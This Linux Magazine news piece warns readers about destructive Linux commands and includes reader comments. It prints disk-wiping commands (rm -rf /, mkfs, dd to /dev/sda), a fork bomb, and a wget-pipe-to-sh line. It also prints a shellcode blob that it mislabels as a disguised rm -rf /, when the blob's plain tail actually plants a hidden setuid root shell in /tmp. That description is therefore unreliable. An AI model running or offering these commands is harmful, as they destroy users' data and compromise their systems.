Seven Deadliest Linux Commands
In a TechSource Blog blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.
Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."
CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!
The first, classic deadly command is certainly:
rm -rf/
The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.
A corollary to the first deadly command is its hex equivalent:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."
A deletion that might proceed somewhat faster than a complete hard disk wipeout is:
mkfs.ext3 /dev/sda
The command will do horrible things to sda.
If losing data were bad enough, consider this command:
:(){:|:&};:
It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.
Back to the hard disk, with this command:
any_command > /dev/sda
The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.
Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:
wget http:// some_untrusted_source -O- | sh
The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.
The last of the seven deadliest commands Auza calls the /dev/null trick:
mv /home/my_home_directory/* /dev/null
Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.
As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:
dd if=/dev/urandom of=/dev/sda
This fills the sda disk with random numbers. Oh joy!
Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.
Comments
comments powered by DisqusSubscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
ESET Discovers New Linux Malware
WolfsBane is an all-in-one malware that has hit the Linux operating system and includes a dropper, a launcher, and a backdoor.
-
New Linux Kernel Patch Allows Forcing a CPU Mitigation
Even when CPU mitigations can consume precious CPU cycles, it might not be a bad idea to allow users to enable them, even if your machine isn't vulnerable.
-
Red Hat Enterprise Linux 9.5 Released
Notify your friends, loved ones, and colleagues that the latest version of RHEL is available with plenty of enhancements.
-
Linux Sees Massive Performance Increase from a Single Line of Code
With one line of code, Intel was able to increase the performance of the Linux kernel by 4,000 percent.
-
Fedora KDE Approved as an Official Spin
If you prefer the Plasma desktop environment and the Fedora distribution, you're in luck because there's now an official spin that is listed on the same level as the Fedora Workstation edition.
-
New Steam Client Ups the Ante for Linux
The latest release from Steam has some pretty cool tricks up its sleeve.
-
Gnome OS Transitioning Toward a General-Purpose Distro
If you're looking for the perfectly vanilla take on the Gnome desktop, Gnome OS might be for you.
-
Fedora 41 Released with New Features
If you're a Fedora fan or just looking for a Linux distribution to help you migrate from Windows, Fedora 41 might be just the ticket.
-
AlmaLinux OS Kitten 10 Gives Power Users a Sneak Preview
If you're looking to kick the tires of AlmaLinux's upstream version, the developers have a purrfect solution.
-
Gnome 47.1 Released with a Few Fixes
The latest release of the Gnome desktop is all about fixing a few nagging issues and not about bringing new features into the mix.
jdong
Even more deadly
$ source ~/.bash_history
Well, how would you clean up THIS mess you just made?
data protection
Not really that dangerous....
Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.
Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.
Other than that, great article!
stolen indeed
Not convinced? Let's look at a quick side-by-side:
Blog:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
UF announcement:
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Blog:
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
UF annoucnement
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data
If you think this wording choice is similar only by coincidence, then fine.
not stolen
Stolen from UbuntuForums announcement